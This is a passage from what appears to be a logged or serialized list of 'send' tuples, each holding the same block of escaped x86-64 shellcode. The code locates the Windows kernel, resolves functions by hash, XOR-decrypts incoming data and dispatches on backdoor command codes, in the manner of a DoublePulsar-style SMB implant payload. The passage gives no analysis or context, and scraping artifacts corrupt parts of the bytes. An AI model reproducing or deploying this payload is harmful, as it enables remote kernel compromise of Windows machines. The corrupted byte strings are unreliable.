xff9\\\\xc8t\\\\x0eH\\\\xff\\\\xc7H9\\\\xdft\\\\x0b\\\\xeb\\\\xe4Y^_\\\\xc3H\\\\x89\\\\xf8\\\\xeb\\\\xf7H1\\\\xc0\\\\xeb\\\\xf2VH\\\\x89\\\\xc6H1\\\\xc0\\\\x8bA\\\\x1cH\\\\x01\\\\xf0^\\\\xc3VH\\\\x89\\\\xc6H1\\\\xc0\\\\x8bA 
H\\\\x01\\\\xf0^\\\\xc3VH\\\\x89\\\\xc6H1\\\\xc0\\\\x8bA$H\\\\x01\\\\xf0^\\\\xc3H\\\\xd1\\\\xe1H\\\\x01\\\\xc8f\\\\x8b\\\\x00\\\\xc3H\\\\x81\\\\xca\\\\x00\\\\x00\\\\xff\\\\xffH\\\\x81\\\\xf2\\\\x00\\\\x00\\\\xff\\\\xffH\\\\xc1\\\\xe2\\\\x02H\\\\x01\\\\xd1H1\\\\xd2\\\\x8b\\\\x11H\\\\x01\\\\xd0\\\\xc3WVSUATAUAVAWI\\\\x89\\\\xe4H\\\\x81\\\\xec\\\\x08\\\\x01\\\\x00\\\\x00I\\\\x89\\\\xcfH\\\\x8d-\\\\xe0\\\\xff\\\\xff\\\\xfff\\\\x81\\\\xe5\\\\x00\\\\xf0H\\\\x89MXH1\\\\xd2f\\\\x8bQ\\\\x02H\\\\x01\\\\xcaH;\\\\x11t\\\\x06H\\\\x8dI\\\\x08\\\\xeb\\\\xf5H\\\\x8dA(H\\\\x89E4H\\\\x8bA\\\\xf0H\\\\x89E(\\\\xe8(\\\\x01\\\\x00\\\\x00\\\\xe8{\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xed\\\\x00\\\\x00\\\\x00L\\\\x8bm<A\\\\x8bM\\\\xbc\\\\xe8\\\\xf9\\\\x00\\\\x00\\\\x00<#t\\\\r<wt\\\\x1d<\\\\xc8t#\\\\xe9\\\\xbd\\\\x00\\\\x00\\\\x00H\\\\x8bM(\\\\x8bED\\\\x89A\\\\x0e\\\\xb0\\\\x01\\\\x88A\\\\x12\\\\xe9\\\\xa5\\\\x00\\\\x00\\\\x00\\\\xe8\\\\xf4\\\\x00\\\\x00\\\\x00\\\\xe9\\\\x9b\\\\x00\\\\x00\\\\x00H1\\\\xdbH1\\\\xf6H1\\\\xffI\\\\x8bE\\\\xd8\\\\x8b\\\\x18\\\\x8bp\\\\x04\\\\x8bx\\\\x08\\\\x8bMH1\\\\xcb1\\\\xce1\\\\xcfA;u\\\\x10u{;]TH\\\\x8bELt\\\\x16\\\\xe8\\\\xd1\\\\x00\\\\x00\\\\x00H\\\\x8dS\\\\x04H1\\\\xc9\\\\xffU\\\\x10H\\\\x89EL\\\\x89]TH\\\\x85\\\\xc0t[H\\\\x01\\\\xf7H9\\\\xdfwOH)\\\\xf7H\\\\x01\\\\xc7WH\\\\x89\\\\xf1QI\\\\x8bu\\\\xe8\\\\xf3\\\\xa4YH\\\\xc1\\\\xe9\\\\x02^\\\\x8bUH1\\\\x16H\\\\x83\\\\xc6\\\\x04\\\\xe2\\\\xf8H\\\\x01\\\\xd8H9\\\\xc6|!\\\\xffUL\\\\xe8\\\\x81\\\\x00\\\\x00\\\\x00\\\\x8bED\\\\xd1\\\\xe8H1\\\\xc9\\\\x88\\\\xc1H\\\\x01\\\\xe9\\\\x8b\\\\t1\\\\xc8\\\\x89ED\\\\xe8C\\\\x00\\\\x00\\\\x00\\\\xb0\\\\x10\\\\xeb\\\\x08\\\\xb0 \\\\xeb\\\\x04\\\\xb00\\\\xeb\\\\x00H\\\\x8bM(\\\\xb4\\\\x00f\\\\x01A\\\\x1eH\\\\x8bE 
L\\\\x89\\\\xf9L\\\\x89\\\\xe4A_A^A]A\\\\\\\\][^_\\\\xff`x1\\\\xc0\\\\x88\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc3Q\\\\x8bED\\\\x89\\\\xc1\\\\x0f\\\\xc9\\\\xd1\\\\xe01\\\\xc8\\\\x89EHY\\\\xc3Q\\\\xe8\\\\x0e\\\\x00\\\\x00\\\\x00H\\\\x8bE H\\\\x8bHxH\\\\x89HpY\\\\xc3SWH\\\\x83\\\\xec(H\\\\x8b]LH\\\\x85\\\\xdbt\\\\x131\\\\xc0H\\\\x89\\\\xdfH1\\\\xc9\\\\x8bMT\\\\xf3\\\\xaaH\\\\x89\\\\xd9\\\\xffU\\\\x18H1\\\\xc0\\\\x89ETH\\\\x89ELH\\\\x83\\\\xc4(_[\\\\xc3QVWH\\\\x8bu4H\\\\x8b\\\\x0e\\\\xe8H\\\\x00\\\\x00\\\\x00H\\\\x85\\\\xc0u\\\\x11H\\\\x8dv\\\\x08H\\\\x8b\\\\x0e\\\\xe87\\\\x00\\\\x00\\\\x00H\\\\x85\\\\xc0t+H\\\\x89M4j\\\\x0cXH\\\\x8d\\\\xb1\\\\x90\\\\x00\\\\x00\\\\x00;\\\\x06t\\\\x08H\\\\x83\\\\xc6\\\\x08;\\\\x06u\\\\x11;F\\\\x04u\\\\x0cH\\\\x89u<H1\\\\xc0H\\\\xff\\\\xc0\\\\xeb\\\\x03H1\\\\xc0_^Y\\\\xc3H1\\\\xc0H9\\\\xc1}\\\\x03H\\\\xff\\\\xc0\\\\xc3\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00', 0.0)\", \"('send', 18, b'\\\\x89\\\\xecA_A^A]A\\\\\\\\^_][\\\\xc3SRQUH\\\\x89\\\\xe5H\\\\x81\\\\xec\\\\x00\\\\x01\\\\x00\\\\x00WH\\\\x89\\\\xcfH\\\\x89\\\\xd8H\\\\x89\\\\x85\\\\x00\\\\xff\\\\xff\\\\xff\\\\xe8\\\\xbb\\\\x00\\\\x00\\\\x00H\\\\x89\\\\x85\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8H\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85\\\\x10\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x9a\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85\\\\x18\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x8f\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85 \\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x84\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85(\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x89\\\\xf9H\\\\x8b\\\\x95 
\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x9d\\\\x10\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x0f\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x850\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85(\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d0\\\\xff\\\\xff\\\\xff\\\\xe8U\\\\x01\\\\x00\\\\x00f\\\\x89\\\\xc2H\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x18\\\\xff\\\\xff\\\\xff\\\\xe8I\\\\x01\\\\x00\\\\x00_H\\\\x81\\\\xc4\\\\x00\\\\x01\\\\x00\\\\x00]YZ[\\\\xc3VWH1\\\\xf6\\\\x8bp<H\\\\x01\\\\xc6f\\\\x81>PEu\\\\x12H\\\\x81\\\\xc6\\\\x88\\\\x00\\\\x00\\\\x00H1\\\\xff\\\\x8b>H\\\\x01\\\\xf8_^\\\\xc3H1\\\\xc0\\\\xeb\\\\xf8VQWH\\\\x89\\\\xc6H1\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\x07\\\\x01\\\\xc8H\\\\xff\\\\xc6\\\\xeb\\\\xe7_Y^\\\\xc3VWRH\\\\x89\\\\xc6H1\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xd2\\\\x8a\\\\x16\\\\x01\\\\xd0H\\\\xff\\\\xc6\\\\xe2\\\\xecZ_^\\\\xc3VQWH\\\\x89\\\\xc6H1\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\n\\\\x01\\\\xc8H\\\\xff\\\\xc6H\\\\xff\\\\xc6\\\\xeb\\\\xe4_Y^\\\\xc3VH\\\\x89\\\\xc6H\\\\x83\\\\xc6\\\\x18H1\\\\xc0\\\\x8b\\\\x06^\\\\xc3SeH\\\\x8b\\\\x04%8\\\\x00\\\\x00\\\\x00H\\\\[email\u00a0protected]\\\\x04H\\\\xc1\\\\xe8\\\\x0cH\\\\xc1\\\\xe0\\\\x0cH\\\\x8b\\\\x18f\\\\x81\\\\xfbMZt\\\\x08H-\\\\x00\\\\x10\\\\x00\\\\x00\\\\xeb\\\\xee[\\\\xc3WVQH1\\\\xffH\\\\x89\\\\xc6H1\\\\xc0\\\\x8b\\\\x04\\\\xbaH\\\\x01\\\\xf0\\\\[email\u00a0protected]\\\\xff\\\\xff\\\\xff9\\\\xc8t\\\\x0eH\\\\xff\\\\xc7H9\\\\xdft\\\\x0b\\\\xeb\\\\xe4Y^_\\\\xc3H\\\\x89\\\\xf8\\\\xeb\\\\xf7H1\\\\xc0\\\\xeb\\\\xf2VH\\\\x89\\\\xc6H1\\\\xc0\\\\x8bA\\\\x1cH\\\\x01\\\\xf0^\\\\xc3VH\\\\x89\\\\xc6H1\\\\xc0\\\\x8bA 
H\\\\x01\\\\xf0^\\\\xc3VH\\\\x89\\\\xc6H1\\\\xc0\\\\x8bA$H\\\\x01\\\\xf0^\\\\xc3H\\\\xd1\\\\xe1H\\\\x01\\\\xc8f\\\\x8b\\\\x00\\\\xc3H\\\\x81\\\\xca\\\\x00\\\\x00\\\\xff\\\\xffH\\\\x81\\\\xf2\\\\x00\\\\x00\\\\xff\\\\xffH\\\\xc1\\\\xe2\\\\x02H\\\\x01\\\\xd1H1\\\\xd2\\\\x8b\\\\x11H\\\\x01\\\\xd0\\\\xc3WVSUATAUAVAWI\\\\x89\\\\xe4H\\\\x81\\\\xec\\\\x08\\\\x01\\\\x00\\\\x00I\\\\x89\\\\xcfH\\\\x8d-\\\\xe0\\\\xff\\\\xff\\\\xfff\\\\x81\\\\xe5\\\\x00\\\\xf0H\\\\x89MXH1\\\\xd2f\\\\x8bQ\\\\x02H\\\\x01\\\\xcaH;\\\\x11t\\\\x06H\\\\x8dI\\\\x08\\\\xeb\\\\xf5H\\\\x8dA(H\\\\x89E4H\\\\x8bA\\\\xf0H\\\\x89E(\\\\xe8(\\\\x01\\\\x00\\\\x00\\\\xe8{\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xed\\\\x00\\\\x00\\\\x00L\\\\x8bm<A\\\\x8bM\\\\xbc\\\\xe8\\\\xf9\\\\x00\\\\x00\\\\x00<#t\\\\r<wt\\\\x1d<\\\\xc8t#\\\\xe9\\\\xbd\\\\x00\\\\x00\\\\x00H\\\\x8bM(\\\\x8bED\\\\x89A\\\\x0e\\\\xb0\\\\x01\\\\x88A\\\\x12\\\\xe9\\\\xa5\\\\x00\\\\x00\\\\x00\\\\xe8\\\\xf4\\\\x00\\\\x00\\\\x00\\\\xe9\\\\x9b\\\\x00\\\\x00\\\\x00H1\\\\xdbH1\\\\xf6H1\\\\xffI\\\\x8bE\\\\xd8\\\\x8b\\\\x18\\\\x8bp\\\\x04\\\\x8bx\\\\x08\\\\x8bMH1\\\\xcb1\\\\xce1\\\\xcfA;u\\\\x10u{;]TH\\\\x8bELt\\\\x16\\\\xe8\\\\xd1\\\\x00\\\\x00\\\\x00H\\\\x8dS\\\\x04H1\\\\xc9\\\\xffU\\\\x10H\\\\x89EL\\\\x89]TH\\\\x85\\\\xc0t[H\\\\x01\\\\xf7H9\\\\xdfwOH)\\\\xf7H\\\\x01\\\\xc7WH\\\\x89\\\\xf1QI\\\\x8bu\\\\xe8\\\\xf3\\\\xa4YH\\\\xc1\\\\xe9\\\\x02^\\\\x8bUH1\\\\x16H\\\\x83\\\\xc6\\\\x04\\\\xe2\\\\xf8H\\\\x01\\\\xd8H9\\\\xc6|!\\\\xffUL\\\\xe8\\\\x81\\\\x00\\\\x00\\\\x00\\\\x8bED\\\\xd1\\\\xe8H1\\\\xc9\\\\x88\\\\xc1H\\\\x01\\\\xe9\\\\x8b\\\\t1\\\\xc8\\\\x89ED\\\\xe8C\\\\x00\\\\x00\\\\x00\\\\xb0\\\\x10\\\\xeb\\\\x08\\\\xb0 \\\\xeb\\\\x04\\\\xb00\\\\xeb\\\\x00H\\\\x8bM(\\\\xb4\\\\x00f\\\\x01A\\\\x1eH\\\\x8bE 
L\\\\x89\\\\xf9L\\\\x89\\\\xe4A_A^A]A\\\\\\\\][^_\\\\xff`x1\\\\xc0\\\\x88\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc3Q\\\\x8bED\\\\x89\\\\xc1\\\\x0f\\\\xc9\\\\xd1\\\\xe01\\\\xc8\\\\x89EHY\\\\xc3Q\\\\xe8\\\\x0e\\\\x00\\\\x00\\\\x00H\\\\x8bE H\\\\x8bHxH\\\\x89HpY\\\\xc3SWH\\\\x83\\\\xec(H\\\\x8b]LH\\\\x85\\\\xdbt\\\\x131\\\\xc0H\\\\x89\\\\xdfH1\\\\xc9\\\\x8bMT\\\\xf3\\\\xaaH\\\\x89\\\\xd9\\\\xffU\\\\x18H1\\\\xc0\\\\x89ETH\\\\x89ELH\\\\x83\\\\xc4(_[\\\\xc3QVWH\\\\x8bu4H\\\\x8b\\\\x0e\\\\xe8H\\\\x00\\\\x00\\\\x00H\\\\x85\\\\xc0u\\\\x11H\\\\x8dv\\\\x08H\\\\x8b\\\\x0e\\\\xe87\\\\x00\\\\x00\\\\x00H\\\\x85\\\\xc0t+H\\\\x89M4j\\\\x0cXH\\\\x8d\\\\xb1\\\\x90\\\\x00\\\\x00\\\\x00;\\\\x06t\\\\x08H\\\\x83\\\\xc6\\\\x08;\\\\x06u\\\\x11;F\\\\x04u\\\\x0cH\\\\x89u<H1\\\\xc0H\\\\xff\\\\xc0\\\\xeb\\\\x03H1\\\\xc0_^Y\\\\xc3H1\\\\xc0H9\\\\xc1}\\\\x03H\\\\xff\\\\xc0\\\\xc3\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00', 0.0)\", \"('send', 19, b'\\\\x89\\\\xecA_A^A]A\\\\\\\\^_][\\\\xc3SRQUH\\\\x89\\\\xe5H\\\\x81\\\\xec\\\\x00\\\\x01\\\\x00\\\\x00WH\\\\x89\\\\xcfH\\\\x89\\\\xd8H\\\\x89\\\\x85\\\\x00\\\\xff\\\\xff\\\\xff\\\\xe8\\\\xbb\\\\x00\\\\x00\\\\x00H\\\\x89\\\\x85\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8H\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85\\\\x10\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x9a\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85\\\\x18\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x8f\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85 \\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x84\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85(\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x89\\\\xf9H\\\\x8b\\\\x95 
\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x9d\\\\x10\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x0f\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x850\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85(\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d0\\\\xff\\\\xff\\\\xff\\\\xe8U\\\\x01\\\\x00\\\\x00f\\\\x89\\\\xc2H\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x18\\\\xff\\\\xff\\\\xff\\\\xe8I\\\\x01\\\\x00\\\\x00_H\\\\x81\\\\xc4\\\\x00\\\\x01\\\\x00\\\\x00]YZ[\\\\xc3VWH1\\\\xf6\\\\x8bp<H\\\\x01\\\\xc6f\\\\x81>PEu\\\\x12H\\\\x81\\\\xc6\\\\x88\\\\x00\\\\x00\\\\x00H1\\\\xff\\\\x8b>H\\\\x01\\\\xf8_^\\\\xc3H1\\\\xc0\\\\xeb\\\\xf8VQWH\\\\x89\\\\xc6H1\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\x07\\\\x01\\\\xc8H\\\\xff\\\\xc6\\\\xeb\\\\xe7_Y^\\\\xc3VWRH\\\\x89\\\\xc6H1\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xd2\\\\x8a\\\\x16\\\\x01\\\\xd0H\\\\xff\\\\xc6\\\\xe2\\\\xecZ_^\\\\xc3VQWH\\\\x89\\\\xc6H1\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\n\\\\x01\\\\xc8H\\\\xff\\\\xc6H\\\\xff\\\\xc6\\\\xeb\\\\xe4_Y^\\\\xc3VH\\\\x89\\\\xc6H\\\\x83\\\\xc6\\\\x18H1\\\\xc0\\\\x8b\\\\x06^\\\\xc3SeH\\\\x8b\\\\x04%8\\\\x00\\\\x00\\\\x00H\\\\[email\u00a0protected]\\\\x04H\\\\xc1\\\\xe8\\\\x0cH\\\\xc1\\\\xe0\\\\x0cH\\\\x8b\\\\x18f\\\\x81\\\\xfbMZt\\\\x08H-\\\\x00\\\\x10\\\\x00\\\\x00\\\\xeb\\\\xee[\\\\xc3WVQH1\\\\xffH\\\\x89\\\\xc6H1\\\\xc0\\\\x8b\\\\x04\\\\xbaH\\\\x01\\\\xf0\\\\[email\u00a0protected]\\\\xff\\\\xff\\\\xff9\\\\xc8t\\\\x0eH\\\\xff\\\\xc7H9\\\\xdft\\\\x0b\\\\xeb\\\\xe4Y^_\\\\xc3H\\\\x89\\\\xf8\\\\xeb\\\\xf7H1\\\\xc0\\\\xeb\\\\xf2VH\\\\x89\\\\xc6H1\\\\xc0\\\\x8bA\\\\x1cH\\\\x01\\\\xf0^\\\\xc3VH\\\\x89\\\\xc6H1\\\\xc0\\\\x8bA 
H\\\\x01\\\\xf0^\\\\xc3VH\\\\x89\\\\xc6H1\\\\xc0\\\\x8bA$H\\\\x01\\\\xf0^\\\\xc3H\\\\xd1\\\\xe1H\\\\x01\\\\xc8f\\\\x8b\\\\x00\\\\xc3H\\\\x81\\\\xca\\\\x00\\\\x00\\\\xff\\\\xffH\\\\x81\\\\xf2\\\\x00\\\\x00\\\\xff\\\\xffH\\\\xc1\\\\xe2\\\\x02H\\\\x01\\\\xd1H1\\\\xd2\\\\x8b\\\\x11H\\\\x01\\\\xd0\\\\xc3WVSUATAUAVAWI\\\\x89\\\\xe4H\\\\x81\\\\xec\\\\x08\\\\x01\\\\x00\\\\x00I\\\\x89\\\\xcfH\\\\x8d-\\\\xe0\\\\xff\\\\xff\\\\xfff\\\\x81\\\\xe5\\\\x00\\\\xf0H\\\\x89MXH1\\\\xd2f\\\\x8bQ\\\\x02H\\\\x01\\\\xcaH;\\\\x11t\\\\x06H\\\\x8dI\\\\x08\\\\xeb\\\\xf5H\\\\x8dA(H\\\\x89E4H\\\\x8bA\\\\xf0H\\\\x89E(\\\\xe8(\\\\x01\\\\x00\\\\x00\\\\xe8{\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xed\\\\x00\\\\x00\\\\x00L\\\\x8bm<A\\\\x8bM\\\\xbc\\\\xe8\\\\xf9\\\\x00\\\\x00\\\\x00<#t\\\\r<wt\\\\x1d<\\\\xc8t#\\\\xe9\\\\xbd\\\\x00\\\\x00\\\\x00H\\\\x8bM(\\\\x8bED\\\\x89A\\\\x0e\\\\xb0\\\\x01\\\\x88A\\\\x12\\\\xe9\\\\xa5\\\\x00\\\\x00\\\\x00\\\\xe8\\\\xf4\\\\x00\\\\x00\\\\x00\\\\xe9\\\\x9b\\\\x00\\\\x00\\\\x00H1\\\\xdbH1\\\\xf6H1\\\\xffI\\\\x8bE\\\\xd8\\\\x8b\\\\x18\\\\x8bp\\\\x04\\\\x8bx\\\\x08\\\\x8bMH1\\\\xcb1\\\\xce1\\\\xcfA;u\\\\x10u{;]TH\\\\x8bELt\\\\x16\\\\xe8\\\\xd1\\\\x00\\\\x00\\\\x00H\\\\x8dS\\\\x04H1\\\\xc9\\\\xffU\\\\x10H\\\\x89EL\\\\x89]TH\\\\x85\\\\xc0t[H\\\\x01\\\\xf7H9\\\\xdfwOH)\\\\xf7H\\\\x01\\\\xc7WH\\\\x89\\\\xf1QI\\\\x8bu\\\\xe8\\\\xf3\\\\xa4YH\\\\xc1\\\\xe9\\\\x02^\\\\x8bUH1\\\\x16H\\\\x83\\\\xc6\\\\x04\\\\xe2\\\\xf8H\\\\x01\\\\xd8H9\\\\xc6|!\\\\xffUL\\\\xe8\\\\x81\\\\x00\\\\x00\\\\x00\\\\x8bED\\\\xd1\\\\xe8H1\\\\xc9\\\\x88\\\\xc1H\\\\x01\\\\xe9\\\\x8b\\\\t1\\\\xc8\\\\x89ED\\\\xe8C\\\\x00\\\\x00\\\\x00\\\\xb0\\\\x10\\\\xeb\\\\x08\\\\xb0 \\\\xeb\\\\x04\\\\xb00\\\\xeb\\\\x00H\\\\x8bM(\\\\xb4\\\\x00f\\\\x01A\\\\x1eH\\\\x8bE 
L\\\\x89\\\\xf9L\\\\x89\\\\xe4A_A^A]A\\\\\\\\][^_\\\\xff`x1\\\\xc0\\\\x88\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc3Q\\\\x8bED\\\\x89\\\\xc1\\\\x0f\\\\xc9\\\\xd1\\\\xe01\\\\xc8\\\\x89EHY\\\\xc3Q\\\\xe8\\\\x0e\\\\x00\\\\x00\\\\x00H\\\\x8bE H\\\\x8bHxH\\\\x89HpY\\\\xc3SWH\\\\x83\\\\xec(H\\\\x8b]LH\\\\x85\\\\xdbt\\\\x131\\\\xc0H\\\\x89\\\\xdfH1\\\\xc9\\\\x8bMT\\\\xf3\\\\xaaH\\\\x89\\\\xd9\\\\xffU\\\\x18H1\\\\xc0\\\\x89ETH\\\\x89ELH\\\\x83\\\\xc4(_[\\\\xc3QVWH\\\\x8bu4H\\\\x8b\\\\x0e\\\\xe8H\\\\x00\\\\x00\\\\x00H\\\\x85\\\\xc0u\\\\x11H\\\\x8dv\\\\x08H\\\\x8b\\\\x0e\\\\xe87\\\\x00\\\\x00\\\\x00H\\\\x85\\\\xc0t+H\\\\x89M4j\\\\x0cXH\\\\x8d\\\\xb1\\\\x90\\\\x00\\\\x00\\\\x00;\\\\x06t\\\\x08H\\\\x83\\\\xc6\\\\x08;\\\\x06u\\\\x11;F\\\\x04u\\\\x0cH\\\\x89u<H1\\\\xc0H\\\\xff\\\\xc0\\\\xeb\\\\x03H1\\\\xc0_^Y\\\\xc3H1\\\\xc0H9\\\\xc1}\\\\x03H\\\\xff\\\\xc0\\\\xc3\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00', 0.0)\", \"('send', 20, b'\\\\x89\\\\xecA_A^A]A\\\\\\\\^_][\\\\xc3SRQUH\\\\x89\\\\xe5H\\\\x81\\\\xec\\\\x00\\\\x01\\\\x00\\\\x00WH\\\\x89\\\\xcfH\\\\x89\\\\xd8H\\\\x89\\\\x85\\\\x00\\\\xff\\\\xff\\\\xff\\\\xe8\\\\xbb\\\\x00\\\\x00\\\\x00H\\\\x89\\\\x85\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8H\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85\\\\x10\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x9a\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85\\\\x18\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x8f\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85 \\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x84\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85(\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x89\\\\xf9H\\\\x8b\\\\x95 
\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x9d\\\\x10\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x0f\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x850\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85(\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d0\\\\xff\\\\xff\\\\xff\\\\xe8U\\\\x01\\\\x00\\\\x00f\\\\x89\\\\xc2H\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x18\\\\xff\\\\xff\\\\xff\\\\xe8I\\\\x01\\\\x00\\\\x00_H\\\\x81\\\\xc4\\\\x00\\\\x01\\\\x00\\\\x00]YZ[\\\\xc3VWH1\\\\xf6\\\\x8bp<H\\\\x01\\\\xc6f\\\\x81>PEu\\\\x12H\\\\x81\\\\xc6\\\\x88\\\\x00\\\\x00\\\\x00H1\\\\xff\\\\x8b>H\\\\x01\\\\xf8_^\\\\xc3H1\\\\xc0\\\\xeb\\\\xf8VQWH\\\\x89\\\\xc6H1\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\x07\\\\x01\\\\xc8H\\\\xff\\\\xc6\\\\xeb\\\\xe7_Y^\\\\xc3VWRH\\\\x89\\\\xc6H1\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xd2\\\\x8a\\\\x16\\\\x01\\\\xd0H\\\\xff\\\\xc6\\\\xe2\\\\xecZ_^\\\\xc3VQWH\\\\x89\\\\xc6H1\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\n\\\\x01\\\\xc8H\\\\xff\\\\xc6H\\\\xff\\\\xc6\\\\xeb\\\\xe4_Y^\\\\xc3VH\\\\x89\\\\xc6H\\\\x83\\\\xc6\\\\x18H1\\\\xc0\\\\x8b\\\\x06^\\\\xc3SeH\\\\x8b\\\\x04%8\\\\x00\\\\x00\\\\x00H\\\\[email\u00a0protected]\\\\x04H\\\\xc1\\\\xe8\\\\x0cH\\\\xc1\\\\xe0\\\\x0cH\\\\x8b\\\\x18f\\\\x81\\\\xfbMZt\\\\x08H-\\\\x00\\\\x10\\\\x00\\\\x00\\\\xeb\\\\xee[\\\\xc3WVQH1\\\\xffH\\\\x89\\\\xc6H1\\\\xc0\\\\x8b\\\\x04\\\\xbaH\\\\x01\\\\xf0\\\\[email\u00a0protected]\\\\xff\\\\xff\\\\xff9\\\\xc8t\\\\x0eH\\\\xff\\\\xc7H9\\\\xdft\\\\x0b\\\\xeb\\\\xe4Y^_\\\\xc3H\\\\x89\\\\xf8\\\\xeb\\